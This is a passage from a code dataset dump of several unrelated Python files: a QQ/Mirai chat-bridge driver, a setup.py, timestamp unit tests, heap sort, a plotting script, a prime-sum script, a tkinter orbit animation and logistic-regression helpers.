'[顶呱呱]',\n 222: '[抱抱]',\n 223: '[暴击]',\n 224: '[开枪]',\n 225: '[撩一撩]',\n 226: '[拍桌]',\n 227: '[拍手]',\n 228: '[恭喜]',\n 229: '[干杯]',\n 230: '[嘲讽]',\n 231: '[哼]',\n 232: '[佛系]',\n 233: '[掐一掐]',\n 234: '[惊呆]',\n 235: '[颤抖]',\n 236: '[啃头]',\n 237: '[偷看]',\n 238: '[扇脸]',\n 239: '[原谅]',\n 240: '[喷脸]',\n 241: '[生日快乐]',\n 242: '[Empty]',\n 243: '[Empty]',\n 244: '[Empty]',\n 245: '[Empty]',\n 246: '[Empty]',\n 247: '[Empty]',\n 248: '[Empty]',\n 249: '[Empty]',\n 250: '[Empty]',\n 251: '[Empty]',\n 252: '[Empty]',\n 253: '[Empty]',\n 254: '[Empty]',\n 255: 
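The two parallel tables in this record map the same QQ face IDs to emoji and to Tim-style bracket text. A minimal usage sketch (the `face_to_text` helper and its inputs are illustrative, not part of the driver; it mirrors the `& 255` masking and `❓` fallback the driver applies further down):

```python
# Illustrative helper (not part of the driver): resolve a raw QQ face ID
# to readable text, with the same masking/fallback used in parse_message.
def face_to_text(face_id: int) -> str:
    qq_face = int(face_id) & 255            # face IDs are masked to one byte
    return qq_emoji_text_list.get(qq_face, '\u2753')  # '❓' when unmapped

print(face_to_text(14))    # '[微笑]'
print(face_to_text(999))   # 999 & 255 == 231 -> '[哼]'
```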
'[Empty]',\n}\n\nqq_sface_list = {\n 1: '[拜拜]',\n 2: '[鄙视]',\n 3: '[菜刀]',\n 4: '[沧桑]',\n 5: '[馋了]',\n 6: '[吃惊]',\n 7: '[微笑]',\n 8: '[得意]',\n 9: '[嘚瑟]',\n 10: '[瞪眼]',\n 11: '[震惊]',\n 12: '[鼓掌]',\n 13: '[害羞]',\n 14: '[好的]',\n 15: '[惊呆了]',\n 16: '[静静看]',\n 17: '[可爱]',\n 18: '[困]',\n 19: '[脸红]',\n 20: '[你懂的]',\n 21: '[期待]',\n 22: '[亲亲]',\n 23: '[伤心]',\n 24: '[生气]',\n 25: '[摇摆]',\n 26: '[帅]',\n 27: '[思考]',\n 28: '[震惊哭]',\n 29: '[痛心]',\n 30: '[偷笑]',\n 31: '[挖鼻孔]',\n 32: '[抓狂]',\n 33: '[笑着哭]',\n 34: '[无语]',\n 35: '[捂脸]',\n 36: '[喜欢]',\n 37: '[笑哭]',\n 38: '[疑惑]',\n 39: '[赞]',\n 40: '[眨眼]'\n}\n\n\nclass MiraiDriverConfig(UMRConfig.BaseDriverConfig):\n Base: Literal['Mirai']\n Account: int\n Host: str\n Port: int = Field(18080, ge=0, le=65535)\n AuthKey: str\n NameforPrivateChat: bool = True\n NameforGroupChat: bool = True\n\n\nUMRConfig.register_driver_config(MiraiDriverConfig)\n\n\nclass MiraiDriver(BaseDriverMixin):\n def __init__(self, name):\n super().__init__(name)\n\n self.name = name\n self.logger = UMRLogging.get_logger('Mirai')\n self.loop: asyncio.AbstractEventLoop = asyncio.new_event_loop()\n self.loop.set_exception_handler(self.handle_exception)\n\n self.image_cache = dict()\n self.config: MiraiDriverConfig = UMRConfig.config.Driver[self.name]\n\n self.qq = self.config.Account\n auth_key = self.config.AuthKey\n host = self.config.Host\n port = self.config.Port\n\n self.bot = Bot(self.qq, host, port, auth_key, loop=self.loop)\n self.updater = Updater(self.bot)\n\n @self.updater.add_handler(BotOnlineEvent)\n async def friend_message(event: BotOnlineEvent):\n print(111)\n\n @self.updater.add_handler(Message)\n async def friend_message(event: Message):\n\n if event.type == MessageType.GROUP.value:\n chat_type = ChatType.GROUP\n username = event.member.memberName\n chat_id = event.member.group.id\n user_id = event.member.id\n elif event.type == MessageType.FRIEND.value:\n chat_type = ChatType.PRIVATE\n username = event.friend.remark or event.friend.nickname\n chat_id = event.friend.id\n user_id = event.friend.id\n else:\n chat_type = ChatType.GROUP\n username = event.member.memberName\n chat_id = event.member.id\n user_id = event.member.id\n\n self.logger.debug(f\"[{event.type}][{chat_id}][{username}({user_id})]: \" +\n str(event.messageChain))\n\n message_id = event.messageChain.get_source().id\n\n set_ingress_message_id(src_platform=self.name,\n src_chat_id=chat_id,\n src_chat_type=chat_type,\n src_message_id=message_id,\n user_id=user_id)\n\n if event.type == MessageType.TEMP:\n username += ' [TempMessage]'\n unified_message_list = await self.parse_message(message_chain=event.messageChain,\n chat_id=chat_id,\n chat_type=chat_type,\n username=username,\n user_id=user_id,\n message_id=message_id)\n try:\n for message in unified_message_list:\n await self.receive(message)\n except Exception as e:\n self.logger.exception('unhandled exception:', exc_info=e)\n\n async def parse_message(self,\n message_chain: MessageChain,\n chat_id: int,\n chat_type: ChatType,\n username: str,\n message_id: int,\n user_id: int):\n message_list = list()\n unified_message = UnifiedMessage(platform=self.name,\n chat_id=chat_id,\n chat_type=chat_type,\n name=username,\n user_id=user_id,\n message_id=message_id)\n quote = message_chain.get_quote()\n if quote:\n unified_message.chat_attrs.reply_to = ChatAttribute(platform=self.name,\n chat_id=chat_id,\n chat_type=chat_type,\n user_id=quote.senderId,\n name='unknown',\n message_id=quote.id)\n\n for m in message_chain[1:]:\n if isinstance(m, (Image, FlashImage)):\n # 
message not empty or contained a image, append to list\n if unified_message.image or unified_message.text:\n message_list.append(unified_message)\n unified_message = UnifiedMessage(platform=self.name,\n chat_id=chat_id,\n chat_type=chat_type,\n name=username,\n user_id=user_id,\n message_id=message_id)\n unified_message.image = m.url\n self.logger.debug(f'Received image: [{m.imageId}]')\n\n elif isinstance(m, Plain):\n unified_message.text += m.text\n elif isinstance(m, At):\n\n at_user_text = m.display\n unified_message.text_entities.append(\n MessageEntity(start=len(unified_message.text),\n end=len(unified_message.text) + len(at_user_text),\n entity_type=EntityType.BOLD))\n unified_message.text += at_user_text\n elif isinstance(m, AtAll):\n\n at_user_text = '[@All]'\n unified_message.text_entities.append(\n MessageEntity(start=len(unified_message.text),\n end=len(unified_message.text) + len(at_user_text),\n entity_type=EntityType.BOLD))\n unified_message.text += at_user_text\n elif isinstance(m, Face):\n qq_face = int(m.faceId) & 255\n if qq_face in qq_emoji_list:\n unified_message.text += qq_emoji_list[qq_face]\n else:\n unified_message.text += '\\u2753' # ❓\n elif isinstance(m, Source):\n pass\n elif isinstance(m, Quote):\n pass\n else:\n unified_message.text += str(m)\n self.logger.debug(f'Unhandled message type: {str(m)}')\n\n message_list.append(unified_message)\n return message_list\n\n def start(self):\n def run():\n nonlocal self\n asyncio.set_event_loop(self.loop)\n self.logger.debug(f'Starting Session for {self.name}')\n\n self.loop.create_task(self.updater.run_task())\n self.loop.run_forever()\n\n t = threading.Thread(target=run)\n t.daemon = True\n UMRDriver.threads.append(t)\n t.start()\n\n self.logger.debug(f'Finished initialization for {self.name}')\n\n async def send(self, to_chat: Union[int, str], chat_type: ChatType, messsage: UnifiedMessage):\n \"\"\"\n decorator for send new message\n :return:\n \"\"\"\n self.logger.debug('calling real send')\n return asyncio.run_coroutine_threadsafe(self._send(to_chat, chat_type, messsage), self.loop)\n\n async def _send(self, to_chat: int, chat_type: ChatType, message: UnifiedMessage):\n \"\"\"\n decorator for send new message\n :return:\n \"\"\"\n messages = list()\n\n if (chat_type == ChatType.PRIVATE and self.config.NameforPrivateChat) or \\\n (chat_type in (ChatType.GROUP, ChatType.DISCUSS) and self.config.NameforGroupChat):\n # name logic\n if message.chat_attrs.name:\n messages.append(Plain(text=message.chat_attrs.name))\n # if message.chat_attrs.reply_to:\n # messages.append(Plain(text=' (➡️️' + message.chat_attrs.reply_to.name + ')'))\n if message.chat_attrs.forward_from:\n messages.append(Plain(text=' (️️↩️' + message.chat_attrs.forward_from.name + ')'))\n if message.chat_attrs.name:\n messages.append(Plain(text=': '))\n\n # at user\n if not message.send_action.message_id and message.send_action.user_id:\n messages.append(At(target=message.send_action.user_id))\n messages.append(Plain(text=' '))\n\n if message.text:\n messages.append(Plain(text=message.text))\n\n if message.image:\n # if chat_type == ChatType.PRIVATE:\n # image_type = TargetType.Friend\n # else:\n # image_type = TargetType.Group\n image_id = self.image_cache.get((chat_type, message.image))\n if image_id:\n image = Image(imageId=image_id)\n else:\n image = Image(path=message.image)\n # image = await self.bot.upload_image(image_type=image_type, image_path=message.image)\n # self.image_cache[(image_type, message.image)] = image.imageId\n 
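The `start`/`send` pair in this driver follows a common pattern: one event loop owned by a daemon thread, with other threads handing it coroutines via `asyncio.run_coroutine_threadsafe`. A self-contained sketch of just that pattern (names here are illustrative, not part of the driver):

```python
import asyncio
import threading

loop = asyncio.new_event_loop()

def _run() -> None:
    # The daemon thread owns the loop and runs it until process exit.
    asyncio.set_event_loop(loop)
    loop.run_forever()

threading.Thread(target=_run, daemon=True).start()

async def greet(name: str) -> str:
    await asyncio.sleep(0.1)
    return f'hello {name}'

# From any other thread: schedule the coroutine, then block on the Future.
future = asyncio.run_coroutine_threadsafe(greet('mirai'), loop)
print(future.result(timeout=1))   # hello mirai
```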
messages.append(image)\n self.logger.info('If QQ does not receive this message, '\n 'your account might be suspected of being compromised by Tencent')\n\n quote = message.send_action.message_id or None\n temp_group = None\n if chat_type == ChatType.PRIVATE:\n message_type = MessageType.FRIEND\n else:\n if '[TempMessage]' in message.chat_attrs.name:\n message_type = MessageType.Temp\n temp_group = message.chat_attrs.chat_id\n else:\n message_type = MessageType.GROUP\n\n egress_message = await self.bot.send_message(\n target=to_chat,\n message_type=message_type,\n message=messages,\n temp_group=temp_group,\n quote_source=quote\n )\n\n for i in messages:\n if isinstance(i, Image):\n self.image_cache[(chat_type, message.image)] = i.imageId\n break\n\n if message.chat_attrs:\n set_egress_message_id(src_platform=message.chat_attrs.platform,\n src_chat_id=message.chat_attrs.chat_id,\n src_chat_type=message.chat_attrs.chat_type,\n src_message_id=message.chat_attrs.message_id,\n dst_platform=self.name,\n dst_chat_id=to_chat,\n dst_chat_type=chat_type,\n dst_message_id=egress_message.messageId,\n user_id=self.qq)\n\n async def is_group_admin(self, chat_id: int, chat_type: ChatType, user_id: int):\n if chat_type != ChatType.GROUP:\n return False\n return False\n\n async def is_group_owner(self, chat_id: int, chat_type: ChatType, user_id: int):\n if chat_type != ChatType.GROUP:\n return False\n return False\n\n def handle_exception(self, loop, context):\n # context[\"message\"] will always be there; but context[\"exception\"] may not\n msg = context.get(\"exception\", context[\"message\"])\n self.logger.exception('Unhandled exception: ', exc_info=msg)\n\n\nUMRDriver.register_driver('Mirai', MiraiDriver)\n","sub_path":"umr_mirai_driver/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":23664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"517461700","text":"# Copyright (c) 2019 The Regents of the University of Michigan\n# All rights reserved.\n# This software is licensed under the BSD 3-Clause License.\nfrom setuptools import setup, find_packages\nimport os\nimport sys\n\ndescription = \"Samples, parsers, and writers for formats used in the Glotzer Group.\"\n\n# Import Cython if available\ntry:\n from Cython.Build import cythonize\n import numpy as np\nexcept ImportError:\n print(\"WARNING: Cython not available!\", file=sys.stderr)\n CYTHON = False\nelse:\n CYTHON = True\n\n# Get long description from README.md\ntry:\n this_path = os.path.dirname(os.path.abspath(__file__))\n fn_readme = os.path.join(this_path, 'README.md')\n with open(fn_readme) as fh:\n long_description = fh.read()\nexcept (IOError, OSError):\n long_description = description\n\n\nsetup(\n name='garnett',\n version='0.6.1',\n packages=find_packages(),\n\n ext_modules=cythonize('garnett/*.pyx') if CYTHON else [],\n include_dirs=[np.get_include()] if CYTHON else [],\n\n author='Carl Simon Adorf',\n author_email='csadorf@umich.edu',\n description=description,\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n keywords='simulation trajectory formats particle',\n\n classifiers=[\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: BSD License\",\n \"Topic :: Scientific/Engineering :: Physics\",\n ],\n\n python_requires='>=3.5, <4',\n\n install_requires=[\n 'rowan>=0.5'\n ],\n\n tests_require=[\n 'nose',\n 'ddt'\n 
],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"356847838","text":"################################################################################\n# Copyright (c) 2009-2021, National Research Foundation (SARAO)\n#\n# Licensed under the BSD 3-Clause License (the \"License\"); you may not use\n# this file except in compliance with the License. You may obtain a copy\n# of the License at\n#\n# https://opensource.org/licenses/BSD-3-Clause\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n################################################################################\n\n\"\"\"Tests for the timestamp module.\"\"\"\nfrom __future__ import print_function, division, absolute_import\n\nimport unittest\n\nimport ephem\n\nimport katpoint\n\n\nclass TestTimestamp(unittest.TestCase):\n \"\"\"Test timestamp creation and conversion.\"\"\"\n def setUp(self):\n self.valid_timestamps = [(1248186982.3980861, '2009-07-21 14:36:22.398'),\n (ephem.Date('2009/07/21 02:52:12.34'), '2009-07-21 02:52:12.340'),\n (0, '1970-01-01 00:00:00'),\n (-10, '1969-12-31 23:59:50'),\n ('2009-07-21 02:52:12.034', '2009-07-21 02:52:12.034'),\n ('2009-07-21 02:52:12.000', '2009-07-21 02:52:12'),\n ('2009-07-21 02:52:12', '2009-07-21 02:52:12'),\n ('2009-07-21 02:52', '2009-07-21 02:52:00'),\n ('2009-07-21 02', '2009-07-21 02:00:00'),\n ('2009-07-21', '2009-07-21 00:00:00'),\n ('2009-07', '2009-07-01 00:00:00'),\n ('2009', '2009-01-01 00:00:00'),\n ('2009/07/21 02:52:12.034', '2009-07-21 02:52:12.034'),\n ('2009/07/21 02:52:12.000', '2009-07-21 02:52:12'),\n ('2009/07/21 02:52:12', '2009-07-21 02:52:12'),\n ('2009/07/21 02:52', '2009-07-21 02:52:00'),\n ('2009/07/21 02', '2009-07-21 02:00:00'),\n ('2009/07/21', '2009-07-21 00:00:00'),\n ('2009/07', '2009-07-01 00:00:00'),\n ('2009', '2009-01-01 00:00:00'),\n ('2019-07-21 02:52:12', '2019-07-21 02:52:12')]\n self.invalid_timestamps = ['gielie', '03 Mar 2003']\n self.overflow_timestamps = ['2049-07-21 02:52:12']\n\n def test_construct_timestamp(self):\n \"\"\"Test construction of timestamps.\"\"\"\n for v, s in self.valid_timestamps:\n t = katpoint.Timestamp(v)\n self.assertEqual(str(t), s, \"Timestamp string ('%s') differs from expected one ('%s')\" % (str(t), s))\n for v in self.invalid_timestamps:\n self.assertRaises(ValueError, katpoint.Timestamp, v)\n# for v in self.overflow_timestamps:\n# self.assertRaises(OverflowError, katpoint.Timestamp, v)\n\n def test_numerical_timestamp(self):\n \"\"\"Test numerical properties of timestamps.\"\"\"\n t = katpoint.Timestamp(self.valid_timestamps[0][0])\n self.assertEqual(t, t + 0.0)\n self.assertNotEqual(t, t + 1.0)\n self.assertTrue(t > t - 1.0)\n self.assertTrue(t < t + 1.0)\n self.assertEqual(t, eval('katpoint.' 
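The setup script just above makes its Cython build step optional via a try/except import guard; the same shape works for any optional build accelerator (sketch with a hypothetical package name):

```python
# Sketch of the optional-dependency guard used above; 'mypkg' is made up.
try:
    from Cython.Build import cythonize
    import numpy as np
except ImportError:
    ext_modules, include_dirs = [], []   # pure-Python install still works
else:
    ext_modules = cythonize('mypkg/*.pyx')
    include_dirs = [np.get_include()]
```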
+ repr(t)))\n self.assertEqual(float(t), self.valid_timestamps[0][0])\n t = katpoint.Timestamp(self.valid_timestamps[1][0])\n self.assertAlmostEqual(t.to_ephem_date(), self.valid_timestamps[1][0], places=9)\n try:\n self.assertEqual(hash(t), hash(t + 0.0), 'Timestamp hashes not equal')\n except TypeError:\n self.fail('Timestamp object not hashable')\n\n def test_operators(self):\n \"\"\"Test operators defined for timestamps.\"\"\"\n T = katpoint.Timestamp(self.valid_timestamps[0][0])\n S = T.secs\n # Logical operators, float treated as absolute time\n self.assertTrue(T == S)\n self.assertTrue(T < S+1)\n self.assertTrue(T > S-1)\n # Arithmetic operators, float treated as interval\n self.assertTrue(isinstance(T - S, katpoint.Timestamp))\n self.assertTrue(isinstance(S - T, float))\n self.assertTrue(isinstance(T - T, float))\n","sub_path":"katpoint/test/test_timestamp.py","file_name":"test_timestamp.py","file_ext":"py","file_size_in_byte":4565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"499067045","text":"def left(ind):\n return (2 * ind) + 1\n\n\ndef right(ind):\n return (2 * ind) + 2\n\n\ndef heapify(arr, i, heap_size):\n l = left(i)\n r = right(i)\n if l < heap_size and arr[l] > arr[i]:\n largest = l\n else:\n largest = i\n if r < heap_size and arr[r] > arr[largest]:\n largest = r\n if largest != i:\n arr[i], arr[largest] = arr[largest], arr[i]\n # print(\"array after heapifying\", arr)\n heapify(arr, largest, heap_size)\n\n\ndef build_max(arr, heap_size):\n f_nonleaf = len(arr) // 2\n for i in range(f_nonleaf-1, -1, -1):\n heapify(arr, i, heap_size)\n\n # print(\"in build == \", arr)\n\n\ndef heap_sort(arr):\n heap_size = len(arr)\n arr_len = len(arr)\n build_max(arr, heap_size)\n # print(\"after buld == \", arr)\n for i in range(arr_len-1, 0, -1):\n arr[i], arr[0] = arr[0], arr[i]\n heap_size -= 1\n heapify(arr, 0, heap_size)\n\n return arr\n\nfrom random import randint\n\narr = []\nfor i in range(21):\n arr.append(randint(1, 100))\n\nprint(arr)\nheap_sort(arr)\nprint(arr)","sub_path":"Sorting/HeapSort.py","file_name":"HeapSort.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"598935250","text":"#!/usr/bin/env python\n\nimport json\nimport os\nimport numpy\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\n\"\"\"\nThis file is used for visualizing the collected dataset.\nIf and unloading behavior is successful, it will be marked with green circle. Red cross for unsuccessful case.\n\"\"\"\n\n\nclass data_visualization(object):\n\n def __init__(self, image_path, annotation_file):\n self._path = image_path\n self._ant_file = annotation_file\n\n #read annotation file (json) into an object\n self.annotations = {}\n self.h = 256\n self.w = 256\n with open (self._ant_file, 'r') as f: \n self.annotations = json.load(f)\n\n def mark_labels(self):\n #mark the annotations on the image for every input data\n for f in os.listdir(self._path):\n image = mpimg.imread(self._path+'/'+f)\n image_id = int(f.split('.')[0])\n plt.imshow(image)\n #create a list to store unloading points. 
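A quick property check for the heap sort above (assuming `heap_sort` from that snippet is in scope), comparing against the built-in sort on random inputs:

```python
import random

def check_heap_sort(trials: int = 200) -> None:
    # heap_sort sorts in place and returns the list, so compare directly.
    for _ in range(trials):
        arr = [random.randint(1, 100) for _ in range(random.randint(0, 50))]
        assert heap_sort(list(arr)) == sorted(arr)

check_heap_sort()
print('heap_sort agrees with sorted() on random inputs')
```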
Notice, the y-coord needs conversion\n for instance in self.annotations:\n if instance[\"image_id\"] == image_id:\n \n point = [instance['robot_pose'][0], instance['robot_pose'][1]-self.h/2]\n if instance['unloading_result'] == True:\n plt.plot(point[0], point[1], 'og', markersize=5)\n else:\n plt.plot(point[0], point[1], marker='x', color='red', markersize=5)\n #plt.show()\n plt.savefig('data/visualization/'+f)\n plt.close()\n #break\n\nif __name__ == '__main__':\n image_path = 'data/images'\n annotation_file = 'data/annotations.txt'\n\n test = data_visualization(image_path, annotation_file)\n test.mark_labels()\n","sub_path":"tamp_perception/src/data_visulization.py","file_name":"data_visulization.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"542462415","text":"import math\ndef isprime(n):\n for i in range(2,int(math.sqrt(n))+1):\n if n % i == 0:\n return False\n return True\n\ndef sumofprimes(n):\n sum = 2\n for i in range(3,n):\n if isprime(i):\n sum = sum + i\n return sum\n\nprint(str(sumofprimes(2000000)))\n","sub_path":"Python/problem10.py","file_name":"problem10.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"113539965","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom tkinter import*\r\nfrom math import*\r\n \r\nfenetre = Tk()\r\nfenetre.title(\"le mouvement d'une planète autour de son étoile\")\r\n\r\ndef mouvement():\r\n global t\r\n t=t+0.2#temps\r\n w1=0.25#poids\r\n w2=0.3\r\n dessin.coords(etoile,(xc-rs)+R*sin(t*pi),(yc-rs)+R*cos(t*pi),(xc+rs)+R*sin(t*pi),(yc+rs)+R*cos(t*pi))#mvt de l'etoile\r\n dessin.create_oval((xc-rs)+R*sin(t*pi)+rs-0.01,(yc-rs)+R*cos(t*pi)+rs-0.01,(xc-rs)+R*sin(t*pi)+rs+0.01,(yc-rs)+R*cos(t*pi)+rs+0.01,fill='blue')#trace laissee par le jaune et le bleu\r\n dessin.coords(planete,(xc-rp)+R1*sin(t*w1*pi),(yc-rp)+R1*cos(t*w1*pi),(xc+rp)+R1*sin(t*w1*pi),(yc+rp)+R1*cos(t*w1*pi))#mvt du rouge\r\n dessin.create_oval((xc-rp)+R1*sin(t*0.25*pi)+rp-0.01,(yc-rp)+R1*cos(t*0.25*pi)+rp-0.01,(xc-rp)+R1*sin(t*0.25*pi)+rp+0.1,(yc-rp)+R1*cos(t*0.25*pi)+rp+0.1,fill='green')#trace du rouge\r\n dessin.coords(lune,(xc-rlune)+R2*sin(t*w2*pi),(yc-rp)+R2*cos(t*w2*pi),(xc+rlune)+ R2*sin(t*w2*pi),(yc+rlune)+R2*cos(t*w2*pi))#mvt du bleu\r\n\r\n fenetre.after(90,mouvement)#vitesse de defilement\r\n\r\nglobal xs,ys,rs,xp,yp,rp,xc,yc,rc,R,t,xlune,ylune,rlune\r\nt=0\r\n#coordonnées du milieu de centre de masse\r\nxc=500\r\nyc=500\r\nrc=5 #son rayon\r\n#coordonées du centre de l'étoile\r\nxs=450\r\nys=450\r\nrs=20 #son rayon\r\n#coordonnées de la planète\r\nxp=300\r\nyp=300\r\nrp=20\r\n\r\n\r\n#coordonnées de lune\r\nxlune=450\r\nylune=450\r\nrlune=20\r\n\r\n\r\n\r\n# Rayon de la trajectoire de la planete autour de son étoile\r\nR= sqrt((xs-xc)**2+(ys-yc)**2)\r\n\r\nR1=sqrt((xp-xc)**2+(yp-yc)**2)\r\n\r\nR2=sqrt((xlune-xc)**2+(ylune-yc)**2)\r\n\r\ndessin = Canvas(fenetre, width=1000, height = 1000, bg=\"white\", bd=8, relief=\"ridge\")#width=largeur height=longueur bg=fond bd=le contour relief=la mise en avant de la fenetre testez avec raised\r\ndessin.pack()\r\ncentre=dessin.create_oval(xc-rc,yc-rc,xc+rc,yc+rc,fill=\"black\")#cree une boule noire\r\netoile=dessin.create_oval(xs-rs,ys-rs,xs+rs,ys+rs,fill=\"yellow\")#cree une boule jaune\r\nplanete=dessin.create_oval(xp-rp,yp-rp,xp+rp,yp+rp,fill=\"red\")#cree une boule 
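The trial-division version above answers Project Euler 10 correctly but slowly; a Sieve of Eratosthenes computes the same sum in a fraction of the time (standalone sketch, assuming n >= 2):

```python
def sum_primes_below(n: int) -> int:
    # Sieve of Eratosthenes: cross off multiples, then sum the survivors.
    is_prime = [True] * n
    is_prime[0] = is_prime[1] = False
    for i in range(2, int(n ** 0.5) + 1):
        if is_prime[i]:
            is_prime[i * i::i] = [False] * len(is_prime[i * i::i])
    return sum(i for i, prime in enumerate(is_prime) if prime)

print(sum_primes_below(2000000))   # 142913828922, matching sumofprimes
```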
rouge\r\nlune=dessin.create_oval(xlune-rlune,ylune-rlune,xlune+rlune,ylune+rlune,fill=\"blue\")#cree une boule bleu \r\n#si une des 3 lignes ci dessus disparait, il n'y a pas que la boule qui disparait. testez pour comprendre\r\n\r\nmouvement()\r\n\r\nfenetre.mainloop()\r\n","sub_path":"systeme_solaire.py","file_name":"systeme_solaire.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"428981372","text":"#coding=utf-8\n\n\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport h5py\nimport scipy\nfrom PIL import Image\nfrom scipy import ndimage\nfrom lr_utils import load_dataset\n\n\"\"\"\nσ函数\n \n x: 标量,或者numpy数组\n\"\"\"\ndef sigmoid(x):\n s = 1.0 / (1 + 1/np.exp(x))\n return s\n\n\n\"\"\"\nσ函数求导\n \n x: 标量,或者numpy数组\n\"\"\"\ndef sigmoid_derivative(x):\n s = 1.0 / (1 + 1/np.exp(x))\n ds = s * (1 - s)\n return ds\n\n\n\"\"\"\n3维向量转成1维向量\n\n image: numpy数组,红绿蓝3维\n\"\"\"\ndef image2vector(image):\n v = image.reshape( (image.shape[0] * image.shape[1] * image.shape[2], 1) ) # 不改变数组的数据,改变矩阵的形状\n return v\n\n\n\"\"\"\n标准化矩阵的行\n\n x: n行m列矩阵\n\"\"\"\ndef normalizeRows(x):\n x_norm = np.linalg.norm(x, axis=1, keepdims=True) # 计算每一行的长度,得到一个列向量\n\n x = x / x_norm # 利用numpy的广播,用矩阵与列向量相除。\n return x\n\n\n\"\"\"\n \n\"\"\"\ndef softmax(x):\n x_exp = np.exp(x) # 算出矩阵所有元素(x)的e的x次方,形成新的矩阵\n\n x_sum = np.sum(x_exp, axis = 1, keepdims = True) # (n,1) 每行元素的和,形成n行1列矩阵\n\n s = x_exp / x_sum # (n,m) 广播的作用\n return s\n\n\"\"\"\nL1损失函数\n\n yhat,y : numpy array\n\"\"\"\ndef L1(yhat, y):\n loss = np.sum( np.abs(y - yhat) )\n return loss\n\n\n\"\"\"\nL2损失函数\n\n yhat,y : numpy array\n\"\"\"\ndef L2(yhat, y):\n loss = np.sum( np.power((y - yhat),2) )\n return loss\n\n\"\"\"\n创建元素为0的dim行1列向量\n\"\"\"\ndef initialize_with_zeros(dim):\n w = np.zeros((dim, 1))\n b = 0\n\n assert(w.shape == (dim, 1))\n assert(isinstance(b, float) or isinstance(b, int))\n\n return w, b\n\n\n\"\"\"\n实现正向传播,反向传播的损失函数及其导数\n\n w: 权重, 格式为(num_px * num_px * 3, 1)的numpy array\n b: 偏置常量\n X: 数据, 格式为(num_px * num_px * 3, 样本数)的numpy array\n Y: 真值标签向量, 0-非猫, 1-猫,格式为(1, 样本数)的numpy array\n\"\"\"\ndef propagate(w, b, X, Y):\n m = X.shape[1]\n\n A = sigmoid(np.dot(w.T, X)+b) # 计算激活函数\n cost = -(1.0/m)*np.sum(Y*np.log(A)+(1-Y)*np.log(1-A)) # 计算损失函数\n\n dw = (1.0/m)*np.dot(X,(A-Y).T)\n db = (1.0/m)*np.sum(A-Y)\n\n assert(dw.shape == w.shape)\n assert(db.dtype == float)\n cost = np.squeeze(cost)\n assert(cost.shape == ())\n\n grads = {\"dw\": dw,\n \"db\": db}\n\n return grads, cost\n\n\"\"\"\n通过运行梯度下降算法优化w和b\n\n x: 权重, 格式为(num_px * num_px * 3, 1)的numpy array\n b: 偏置常量\n X: 数据, 格式为(num_px * num_px * 3, 样本数)的numpy array\n Y: 真值标签向量, 0-非猫, 1-猫,格式为(1, 样本数)的numpy array\n num_iterations: 最优化函数的迭代次数\n learning_rate: 更新梯度下降算法的学习率\n print_cost: 'true'则每迭代100次打印损耗\n \n params: 包含权重w和偏置b的字典\n grads: 包含损失损失函数的权重和偏置的导数的字典(dictionary containing the gradients of the weights and bias with respect to the cost function)\n costs: 列表,包含最优化计算过程中所有损失,用来画出学习曲线\n\n\"\"\"\ndef optimize(w, b, X, Y, num_iterations, learning_rate, print_cost = False):\n costs = []\n\n for i in range(num_iterations):\n grads, cost = propagate(w, b, X, Y)\n\n dw = grads[\"dw\"]\n db = grads[\"db\"]\n\n w = w - learning_rate*dw\n b = b - learning_rate*db\n\n if i % 100 == 0:\n costs.append(cost)\n\n if print_cost and i % 100 == 0:\n print (\"Cost after iteration %i: %f\" %(i, cost))\n\n params = {\"w\": w,\"b\": b}\n\n grads = {\"dw\": dw,\"db\": db}\n return params, grads, 
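The `sigmoid` in this helper module is written as `1.0 / (1 + 1/np.exp(x))`, which equals `1/(1+e^(-x))` algebraically but divides by zero once `np.exp(x)` underflows for very negative inputs. A numerically stable alternative (a sketch, not the course's reference implementation):

```python
import numpy as np

def sigmoid_stable(x):
    # Split on sign so the exponential argument is always <= 0:
    #   x >= 0 : 1 / (1 + e^-x)
    #   x <  0 : e^x / (1 + e^x)
    x = np.asarray(x, dtype=float)
    out = np.empty_like(x)
    pos = x >= 0
    out[pos] = 1.0 / (1.0 + np.exp(-x[pos]))
    exp_x = np.exp(x[~pos])
    out[~pos] = exp_x / (1.0 + exp_x)
    return out

print(sigmoid_stable(np.array([-1000.0, 0.0, 1000.0])))   # [0.  0.5 1. ]
```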
